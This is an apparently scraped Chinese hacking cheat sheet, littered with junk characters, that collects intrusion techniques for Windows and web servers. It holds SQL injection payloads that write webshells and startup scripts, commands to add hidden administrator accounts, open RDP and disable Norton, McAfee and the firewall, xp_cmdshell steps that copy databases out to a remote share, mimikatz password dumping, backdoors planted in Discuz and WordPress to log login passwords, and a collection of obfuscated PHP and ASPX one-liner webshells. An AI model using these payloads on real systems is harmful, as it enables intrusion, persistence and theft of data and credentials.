create table a (cmd text);
+ F; ?" p- i, B; iinsert into a values ("set wshshell=createobject (""wscript.shell"") " );* L$ J, ~/ E5 R2 Z" [
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
7 _6 q: B- P1 ~) Ninsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
, [. c+ ]# Q9 ^7 C" Y" t. |select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
8 P2 x; g, D$ Y6 P2 W6 A# Vdrop table a;3 i& x! e4 s% u5 |5 |: ?; C* c
/ @- b! i! W8 H p, `8 h- Y英文版本:
! @6 B* d5 A8 W5 q u: H* y
+ @1 ]/ [3 a0 ~! f0 juse test;
" V$ c3 T% v" O% ~1 u+ \create table a (cmd text);
: N5 K3 u5 A( _) J6 w# oinsert into a values ("set wshshell=createobject (""wscript.shell"") " );$ ^' R; R; L7 v% d. M2 z
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
/ ^) }; e2 ~) R4 u3 dinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
4 ^0 u; C/ x* H$ |' {" S9 Vselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
7 d: L6 y* G2 K$ w4 R% Rdrop table a;
7 O/ z1 y( ~) ~; e5 B. q0 K7 X% `: U7 o) n9 x+ P1 x
create table a (cmd BLOB);
3 P" V$ l8 g8 U7 j7 k! Oinsert into a values (CONVERT(木马的16进制代码,CHAR));4 W! q: \: l% Q; g
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
% h+ g3 `$ @' q5 i2 ndrop table a;
6 e! h% o! N l2 _# r
# O+ O% ], j( l( h9 E/ v- h记录一下怎么处理变态诺顿
' ]$ s* i* e4 y! B- u- {3 S查看诺顿服务的路径
- g: a' @5 L, N& \' U ksc qc ccSetMgr* ]/ p* E" ]' p/ U& Z3 t* _
然后设置权限拒绝访问。做绝一点。。8 k( r, |+ E4 E( t, d z* O
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system: u+ A7 [5 l& i- o4 G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"$ S: c. \2 @7 U1 I* T
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
2 _* E/ V7 k# [, a ucacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
; p. V, S& U( t) a- z/ I' t; G3 ^$ k6 G0 y# U1 y# n4 h' n$ _
然后再重启服务器5 W/ D& k. H( |5 h8 }6 G
iisreset /reboot0 a1 O/ X$ M& o4 `) g' C" `6 ?
这样就搞定了。。不过完事后。记得恢复权限。。。。
1 f9 J: m- ]' K; H/ X& Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
2 N# O, C3 z% a, S lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
7 U- L% w( f q9 Y, N( |0 h4 U! ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F* u( K2 x+ c2 D+ U2 W
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F( Z4 i# i5 p. A$ x/ B
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin5 O% d( d( h9 W- b9 V4 }+ i1 P
/ h J4 A ^0 e4 V
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
' T9 i# q: B1 B4 v/ L1 W& f
" j1 D$ K3 ~/ u# q; \- y+ jpostgresql注射的一些东西
4 C B8 t# ` ~: X1 P如何获得webshell4 b1 Q/ G) }# T- F! \+ m
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); # ]1 Q7 f. P! `0 E
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
! R ^9 D% ^, A/ jhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
: V) L9 X% I8 w4 c" [如何读文件, ^) x' e5 T- H6 m; K
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
6 b$ e0 T4 m4 d+ vhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
6 i+ h; e, k# c m" K8 n8 W# Z: thttp://127.0.0.1/postgresql.php?id=1;select * from myfile;0 J- m, ~, p2 I0 H! u
+ ~) j4 U7 J7 d+ d/ Y+ ]. U2 v: qz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。9 U0 V8 y$ z8 J/ s" I% p
当然,这些的postgresql的数据库版本必须大于8.X1 N! x/ c1 S' `2 N
创建一个system的函数:
1 y. @7 }$ i6 M) H2 |CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
8 F8 `1 m9 ]& U$ s0 l: p" }4 h
$ C$ I3 A0 T6 N$ g% ?1 a% t创建一个输出表:/ K. H4 Q/ j* s' r, p. g
CREATE TABLE stdout(id serial, system_out text)+ m3 X2 N; c2 F! O2 }5 t& V
8 B+ C* o: _: {! Q: P
执行shell,输出到输出表内:
9 k5 K/ Q+ D) |8 s% g( aSELECT system('uname -a > /tmp/test')
6 N+ k& R& |. M
V" ?" w8 F' d+ c% Z% m2 A' hcopy 输出的内容到表里面;' ?) M0 D, I) q$ k T; i; P
COPY stdout(system_out) FROM '/tmp/test'3 o( O4 Z" ]8 Z2 w8 [# ~; U" [
4 l9 O( u& e9 t! G- R
从输出表内读取执行后的回显,判断是否执行成功
) z6 e5 _2 ~6 ~3 u6 F' v% {% V3 H, h s- b6 H' M8 y
SELECT system_out FROM stdout
! u, `) G6 R# e( r; ]) D下面是测试例子' O4 n8 A8 `. M! w
6 Y4 P9 e/ U7 W1 M2 v0 ?( U
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
6 @9 n' z+ d2 ~8 u9 Y( {, T2 D+ q7 Y; w( L) f4 E, [' {
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
% q. {* O: F }STRICT --1 Z) @2 }5 A' L! B
* m4 @! K$ g7 q: N( x
/store.php?id=1; SELECT system('uname -a > /tmp/test') --4 P" ^- L e: D A7 m8 U
: D" L7 L% D% ^/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --* `0 ` \4 }& f, U3 t0 [( M
" S ~7 j: @7 S5 }, U
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
+ m/ }; @2 M3 b2 S# A( }6 xnet stop sharedaccess stop the default firewall
9 n! s8 s* N Y8 D* l6 t4 J" }netsh firewall show show/config default firewall
; ^5 Q, m+ P. d) anetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
2 Y8 w! q3 k0 X! ]; {, w9 `; znetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall3 g0 X# n: r4 V: U2 j; j, V2 r
修改3389端口方法(修改后不易被扫出)
% ^9 g3 ~# v# S3 q5 C6 N7 Z. N! X修改服务器端的端口设置,注册表有2个地方需要修改
$ i9 H9 Y. }3 z6 a6 C. ?3 O, t, E4 D
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]. j, y8 q w% {, w/ A# Y
PortNumber值,默认是3389,修改成所希望的端口,比如6000
8 |. I" M' r9 g" o) A' q% V) u) {, q7 R$ I6 N* X* g
第二个地方:4 O( s5 J) e% X& Z E7 I& n, |
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
# T1 S' F6 N: Y8 E% KPortNumber值,默认是3389,修改成所希望的端口,比如6000! N- L+ H- I$ }+ [, u$ ?1 Z, e
. M0 m! ]$ s6 Q. W: d* N现在这样就可以了。重启系统就可以了
) b( J4 M/ t. F# v. v' q
% Y* z- u+ a! m7 \; q' j# ^查看3389远程登录的脚本
" I- W) r3 A' y( v保存为一个bat文件
o3 \) R2 q6 j9 x0 Udate /t >>D:\sec\TSlog\ts.log- L9 r7 F8 O1 e. X
time /t >>D:\sec\TSlog\ts.log n* S& j5 u8 J0 e q m! I) Q: B, T
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log' q2 ~0 X+ v a
start Explorer( a! Y Z6 @9 M- l7 N; Q& r
; N. ?% O3 h X" T' L9 D' r
mstsc的参数:
9 k* h* A. e( [) U* c6 f p6 b) [% i7 u* S9 b I! e, L
远程桌面连接3 @. ~1 ?% ^0 f
; I4 F+ f; J o2 H8 R YMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
1 [+ g1 M. Z0 d' H6 n; k [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?$ \+ ? S& Z8 I5 M. L& t
9 ?3 s1 \$ b8 N6 j<Connection File> -- 指定连接的 .rdp 文件的名称。2 J& X, K$ c- n+ Z
]6 Z% `0 D: y" u! G- ]( F! B0 e) K/ `
/v:<server[:port]> -- 指定要连接到的终端服务器。
1 Z8 z3 H8 g: q) K- G
: M! u) R" t) e+ h! {$ |/console -- 连接到服务器的控制台会话。
8 r- ]* _; A* t, W. p' ]
# w9 B3 {! e1 Y* w/f -- 以全屏模式启动客户端。, M$ z9 j% Z2 M
3 p( R+ l4 {7 Q$ s$ ~; |
/w:<width> -- 指定远程桌面屏幕的宽度。
! o8 t: O( N6 T
, T, V, _* w0 z: [6 D0 g/h:<height> -- 指定远程桌面屏幕的高度。
$ K) {( {4 I9 h3 ?" f/ R
; {. K( t! g8 d& A" U7 F1 r/edit -- 打开指定的 .rdp 文件来编辑。! B3 u% Z+ v: G! }1 j. ^
8 ^9 J1 O: V W7 I& `9 L! X7 ^
/migrate -- 将客户端连接管理器创建的旧版% ?8 N: m1 t- _( f& J2 I, q% M
连接文件迁移到新的 .rdp 连接文件。
; _4 R, G. G& D( n$ M6 ?
* [; ?- X4 U7 ]7 g9 H7 Z4 O, K" P; U |# B! D
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
* }4 P( c) L) W8 u/ o* J8 o" mmstsc /console /v:124.42.126.xxx 突破终端访问限制数量! h. ?! x }: @. V" H
/ N6 Z" D" H, Z2 F' r" Z
命令行下开启3389# R" s8 d; s6 x5 [ d1 V
net user asp.net aspnet /add7 I8 F( t1 A. \; V) x3 D* ?' s& d
net localgroup Administrators asp.net /add1 a. b: e- ?- ]* R: A' K
net localgroup "Remote Desktop Users" asp.net /add
7 ?2 g8 s, Z/ j- x7 Y" x7 Nattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
' c! R- Y- u6 r: C3 lecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0& F" Q# a u( b4 U
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
' k7 `9 J" I) Z: ]- Iecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
3 z, B) t# q4 {sc config rasman start= auto
k, D% ?8 T# l/ U+ x5 usc config remoteaccess start= auto
4 Z4 [' r' {/ c% g5 vnet start rasman
- |3 P, H5 f! D% e( Y q) h. O' Cnet start remoteaccess
; t) }- R9 H7 }, MMedia
: {0 a: z0 z* C! D0 S& |9 `<form id="frmUpload" enctype="multipart/form-data"
6 H- q2 R0 B/ Q9 r7 j' u3 paction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
$ e4 p8 X6 D+ V& V. S1 A<input type="file" name="NewFile" size="50"><br>
: H2 H E3 ?$ I/ Z! [- n, I<input id="btnUpload" type="submit" value="Upload"># R$ O# h3 p0 Y4 \* \
</form>
1 p, N# w# q$ d8 Q% T' @5 s: x$ ~0 R
control userpasswords2 查看用户的密码
1 C9 ], S* N) Q7 E* Faccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
8 d( Z8 w( ^# o# \SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a, g" q0 M7 z" |3 R4 n. O
# v8 a$ l% T, ^) l
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
# R; [' ] @3 s$ ]+ y9 P4 h0 _测试1:6 x" K" p; Q# H" J1 _" V4 O8 R
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 |8 L# ~8 b" D% c. {' x
' G' r! ^. l7 J测试2:4 Z: q& v: Q2 [6 z- [- L
! J9 [0 h/ j) `$ bcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
5 H3 K) n; h& X
' K- ?4 M/ B, j# D. Cdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
/ H) j+ ?( f5 f6 D
8 i4 g" J4 M0 b: r* mSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1. G: e" ^: d* t0 L7 d
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
- Z" C. L3 s6 v0 f& y- F可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;% l- a: F0 l- r7 C/ W" X
net stop mcafeeframework* z% B0 A& _% ?# f6 I' X
net stop mcshield
7 R3 `3 ]0 Y& A5 N" g9 p2 |net stop mcafeeengineservice
. t6 [, |; i( N; r3 U) o" xnet stop mctaskmanager
$ b% R% r" ~ S* u9 uhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D% P6 m) ?+ t# D& ~" R- x
7 e( y& W* I2 C/ b. E$ m+ x
VNCDump.zip (4.76 KB, 下载次数: 1)
6 k0 C8 V# J! S" j- j. B3 y. K) x2 Q9 u. d密码在线破解http://tools88.com/safe/vnc.php
& l$ P# v+ z1 n- iVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取3 \/ h$ E/ I" \! S/ _- Q3 V
0 @% ^# L0 R. y( P& V% lexec master..xp_cmdshell 'net user'5 X% ~6 K' U5 \ c" J( Z
mssql执行命令。
1 `' ~ d# K3 Z) h获取mssql的密码hash查询
3 s) I. b, D4 E: \0 l) R& uselect name,password from master.dbo.sysxlogins
3 ?( |0 [- r5 R b0 C3 l. S! d/ {) Z* c K( S7 y
backup log dbName with NO_LOG;
; C/ k% {1 S3 c3 D! ?backup log dbName with TRUNCATE_ONLY;
9 G! J3 e) c0 EDBCC SHRINKDATABASE(dbName);0 B9 {1 `- T4 @4 w O
mssql数据库压缩
: W1 d3 `+ S' q6 ^- Q$ C( {
/ g: C8 M- e' s$ W3 g6 nRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
4 X/ B5 U, [6 S+ G7 J' T将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。( Z/ {' V( j# T. O- ]) h. F
6 z' `. u" E, [7 U+ K
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
/ }; M8 x H9 `7 `' s备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
# l, {) q, o4 X _4 {+ ?" R" O: O* {- n' ^$ A* t, F( V
Discuz!nt35渗透要点:
0 G, ?, g# R5 N(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default, e# _$ x- `2 I5 ?
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>: k8 `3 j7 X# Z D& B, p
(3)保存。$ T1 i7 O2 ^$ R" p7 E2 _
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass% o2 v# n! h8 X+ E6 I
d:\rar.exe a -r d:\1.rar d:\website\# C% L, G+ _- h5 M/ c" w
递归压缩website1 y) E+ H- ^) r6 u. c
注意rar.exe的路径
# ]# c. u7 \; p5 `$ v) R; W$ `: F7 |& V6 F, _
<?php
9 _) i9 I3 Z- ]1 K h& f$ o6 V4 P7 z# q
$telok = "0${@eval($_POST[xxoo])}";
5 `, f+ g7 i P" b' `* L1 @/ n) X9 U, P. ]' F1 ?2 _
$username = "123456";' }# j, f; w3 s* d/ | d
4 S7 ~7 a. i3 c' e1 Q$userpwd = "123456";4 W. F7 Y$ P' a, v0 }+ G% S
, X0 o+ \+ s$ L' B' j$ E1 b8 |
$telhao = "123456";
V0 a1 o6 x. ~- R( U0 p( Q: g- a
$telinfo = "123456";
+ K7 J! d: g+ u" R( Y2 \ b f" {& r) ^' }
?>6 r) q" z V4 v& B: T6 v
php一句话未过滤插入一句话木马+ g u6 H6 T2 N8 R! {3 U' V' A
; ~ u. H6 K& E2 m5 U5 J站库分离脱裤技巧
" p7 \2 E$ f0 ^( ~) K) W) T Oexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'! P A6 ~8 i% i7 }1 h
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
% J/ ~' F! t" R6 d- T条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。$ W% M& e. Q# u$ p& G. P
这儿利用的是马儿的专家模式(自己写代码)。
$ R! ]7 Y/ k k4 n" _ini_set('display_errors', 1);
5 \: \: ^' F2 J! |! a; z9 E* C% tset_time_limit(0);& p# {8 @, y5 z: @; ^
error_reporting(E_ALL);
; ~2 p4 O" V/ L8 `$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());& |8 |' V4 r A* O
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());' }' _4 s# K' i# I' h( d' H' [
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());6 I/ `1 Z. W' H8 F% {
$i = 0;
8 Q# `- e, x( ~( B* f# Y$tmp = '';
: N% q% R/ x$ ewhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
' x {: x4 M% i- S! y1 v $i = $i+1;! T# x4 }) J* C4 _
$tmp .= implode("::", $row)."\n";
. [1 t }( s6 q( O) `7 T if(!($i%500)){//500条写入一个文件
* K7 D" b, c/ ^6 P$ \0 w v $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';( s; K7 @2 h# j" I
file_put_contents($filename,$tmp);7 T: V% [+ A3 `1 b9 y% v
$tmp = '';
2 S* ~& s, L X/ H% ?+ X9 n( | }8 G9 p! L7 J$ h( \7 F5 `
}
7 f" e" p1 F$ Smysql_free_result($result);4 ]/ O* {7 y9 x% @
* }# c5 }( u1 x$ ]& g8 D+ A2 I3 p% q% Q/ _) I* H/ \
, A8 r1 G3 d4 ~6 k//down完后delete8 D1 U/ H; D7 \9 S( A7 X
- s4 K$ M9 i2 C4 r2 i* r) j$ R; Q9 m
ini_set('display_errors', 1);
+ o8 `" e/ A+ A- H; Werror_reporting(E_ALL);
, u7 N% h% T9 C4 z* F& ]$i = 0;6 B0 P6 L: b0 |
while($i<32) {* u% z* E3 C9 Y3 F8 L6 W. X4 e
$i = $i+1;! ?+ k/ W, Z, K8 M
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
# j" x5 Y% U' [1 L unlink($filename);
5 v o/ T# r! j$ ~7 I6 J2 G5 j7 a} & n$ a* b0 j3 r9 H* u4 V' d0 X' p) d
httprint 收集操作系统指纹5 c9 i& V6 S+ o4 L) Q
扫描192.168.1.100的所有端口
L6 K' S6 i3 ^/ O+ tnmap –PN –sT –sV –p0-65535 192.168.1.1004 b& W# ^9 L1 M- R9 {7 U
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
* W9 r3 F4 O2 x# C, E/ x% chost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输" U, }) k0 C# T* M( [- ~0 {3 z
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
3 X. d8 U( d" q6 U, P
$ ^' l& J: Y V- DDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册) ~0 {4 f6 P& V0 W6 C
! C( {* k4 r/ b' x' p
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
[$ z3 I, I! |) |1 d5 ~" K: y3 E- \; [5 w2 a% _ S" L
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
& }, y% b7 @" {+ F' G5 h! m2 {
9 e) Y9 ?! D% `8 }: m7 I DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)) |# Y; y5 T( ]
/ h4 \7 m+ m0 ^8 K% ? http://net-square.com/msnpawn/index.shtml (要求安装), f! h2 M# @/ [$ B& ~
% m3 n2 h" v, e8 x, \. l tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
7 i& C) @& A' O
+ n% v. d: u+ c$ p1 p! Q. N) w& H SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)1 k! b$ ~ J6 n% r
set names gb23127 }# P2 z+ `. J- @0 w3 f7 K' Q
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
) m% B P+ T+ w' X. S4 X3 E$ x7 }1 U; @8 m3 ^( ?) Y
mysql 密码修改
. T6 ^/ Y/ m. J6 K$ h9 QUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” # e& q3 y' D2 w7 ^: M! A! ]
update user set password=PASSWORD('antian365.com') where user='root';$ ~ L8 q# l! D) I7 D
flush privileges;& v5 w3 I! k- ?, W/ B }& }7 p
高级的PHP一句话木马后门
4 X I( c m; c
5 c/ t4 ~" [5 `1 q8 k2 c6 l0 X- B入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀1 v2 i; Z' _( y, m% Y" e- o& G
& ]" R6 V0 _0 T& f3 M, M( W1、% J3 c1 g' ?1 {2 a% F
4 w. a0 \4 s2 ]! D8 U7 g$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";8 V3 a- j+ D! l
* F2 n" O+ A4 |
$hh("/[discuz]/e",$_POST['h'],"Access");
' w% J$ n+ [, t v" ~) V: u/ z7 q6 Z6 N+ i4 ]! l( O0 R
//菜刀一句话. ~# q$ I7 ~- A5 M4 G8 B0 @" r
5 j, J r$ x- A8 i) X4 X
2、
3 Q) M+ K5 A6 n$ w0 y
/ B' e/ }9 g" |, k% x$filename=$_GET['xbid'];0 y$ y( N8 K0 B+ J/ X. y! [
8 B1 I; t' l5 o& G* Qinclude ($filename);
* B8 @7 m2 O; g1 l
5 s$ k, v% V/ l4 `6 \//危险的include函数,直接编译任何文件为php格式运行
6 o* N: D. y7 b! d ~8 F _2 J$ n9 B; r& }+ j
3、: ^/ v9 K- I9 B+ |9 X6 f( O
8 n" v1 E, A! D$ L2 n) F$reg="c"."o"."p"."y";: n+ {, m1 y8 l* c4 h
1 E- D3 W, }' V; y j% T; [# o2 n$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
" H: y) I. Z7 r4 B, F: D! N1 t5 G U v; E8 C8 Q; j
//重命名任何文件 Z1 w1 P* \0 w: |1 t
# l9 R4 z0 X u* j% C( q4、! z6 G( p J# h& v% o1 I5 V" |
( u8 Z) ^0 `$ U, y$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";9 M9 v% b! I* n2 g) @ V* Y
8 G' t; C! g m! n) m( g" a
$gzid("/[discuz]/e",$_POST['h'],"Access");# a; d' V9 ]# q: N' o
: R, q- `3 E+ O5 p//菜刀一句话! `0 h& Q# ~+ n0 V
0 h& f* z" a; Z U4 g' N9 N
5、include ($uid);
' P/ `# U( E' _/ ]2 |9 N/ O# z% W% ^6 |0 S, H: F
//危险的include函数,直接编译任何文件为php格式运行,POST d1 U% s1 y1 j4 G1 m2 d4 \
, m' L, B1 A* M4 D7 w$ N
9 m7 R* I1 V) J# ^
//gif插一句话
2 o6 z8 {2 N! |8 }5 B7 i! v' ]* A. R! I# z# [
6、典型一句话% \3 Y' ]4 b3 x. R% t
! Y! g+ y. |# ]! H$ i1 v# J程序后门代码' I2 q3 c$ ^" L9 K% N
<?php eval_r($_POST[sb])?>* d. X8 T a: `5 s* w
程序代码
$ S# J, i/ g/ N% a7 D) [$ z% W<?php @eval_r($_POST[sb])?>9 X, U# c; o! D$ D# @ J6 s; `/ ]
//容错代码- Q; O( j9 A5 v' K, z% r* }. f
程序代码3 j" ]3 F J- V9 S5 [# G+ l* S _5 p
<?php assert($_POST[sb]);?>
8 i6 O* F+ z6 l- S8 `) O4 x \//使用lanker一句话客户端的专家模式执行相关的php语句* |1 A. n: Z; V0 C. c
程序代码4 f. M3 G5 ]7 N5 Z d
<?$_POST['sa']($_POST['sb']);?>8 S' \! k/ L P6 @; |
程序代码; E1 U6 A. ]2 `( P# ?8 f- H* S! t! p
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>* n: z/ s- n" ~4 C! B" r
程序代码/ F/ F# E& s- a( s* W, D
<?php4 Q( c+ _; v% O4 N
@preg_replace("/[email]/e",$_POST['h'],"error");& D$ E9 P# v3 R
?>, O8 R$ m. x! d2 ], C
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入/ c: g, J, C* j
程序代码
# U: O+ L5 k7 O! l<O>h=@eval_r($_POST[c]);</O>7 Z$ c5 T4 o0 n9 H+ o, C6 l4 s
程序代码: o1 M" _ v& a% L' y# U' F/ r
<script language="php">@eval_r($_POST[sb])</script>$ x* r/ y6 O8 I I( @& r; o
//绕过<?限制的一句话- I( ?- }! e- o: _
: C# [9 V1 |* }% Nhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip8 S3 ?: N { S
详细用法:- E6 O6 f! V- Y. y
1、到tools目录。psexec \\127.0.0.1 cmd
# c: d# ]0 F7 S2 R; i- J( Y( k) k- n7 y2、执行mimikatz. u; S+ X) V' P/ ]0 z
3、执行 privilege::debug' t. [% N! `! h0 l% l
4、执行 inject::process lsass.exe sekurlsa.dll# j6 A5 ?/ Z% F. J- j$ l
5、执行@getLogonPasswords
7 Y9 N3 x: N0 y6、widget就是密码$ ~6 O6 k; F7 @
7、exit退出,不要直接关闭否则系统会崩溃。
4 Q9 p! @( x; Z9 f& d
2 X- w$ G4 B" Z& k6 \5 \6 uhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面( F2 w+ y4 I1 I9 I, p
- U2 [3 ?+ p+ h* H7 Y
自动查找系统高危补丁% b% D' a* E8 E: X, R! E% w
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt/ J3 a/ }3 g3 H- V8 }% t# i% a2 w
, t' U/ P- M( c# N/ J
突破安全狗的一句话aspx后门
7 Z- k$ M& a/ h2 h. a0 E& f<%@ Page Language="C#" ValidateRequest="false" %>
' U4 d/ |( _1 r2 G( n" n0 E! V3 \<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>9 Z: _ I1 C* Y1 r
webshell下记录WordPress登陆密码
" G7 Z2 R" l% V, ?: ~8 p% ?) bwebshell下记录Wordpress登陆密码方便进一步社工
/ @% }" V' S6 c" v6 V1 `9 l" j. z在文件wp-login.php中539行处添加:$ v5 i2 c5 r" W4 U8 S( v5 f
// log password
6 P7 u o& A* s# z8 V$log_user=$_POST['log'];+ r6 {7 e& f- n5 s$ V0 P% K1 ^
$log_pwd=$_POST['pwd'];1 n4 ?0 a0 t2 [. [
$log_ip=$_SERVER["REMOTE_ADDR"];
4 j# S) O1 _. g: k$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
2 E$ j2 V2 R/ r% U6 ?( u$txt=$txt.”\r\n”;
5 P5 k: n% z' Iif($log_user&&$log_pwd&&$log_ip){4 ], Q9 V0 k8 c, y0 Y
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);% g c, w) d0 ^2 k0 V
}
8 w& g7 c+ i* P) G8 x, t8 `当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。' A3 m( x! Y/ T. ~: L" R I6 h" f
就是搜索case ‘login’
! u# W. [' J/ c9 Q9 n在它下面直接插入即可,记录的密码生成在pwd.txt中,) b/ k4 c# a/ z8 H: ]
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录 X+ f- L# _+ v9 j! A q
利用II6文件解析漏洞绕过安全狗代码:
% t0 y6 ?+ D: s' O: f) e. V;antian365.asp;antian365.jpg
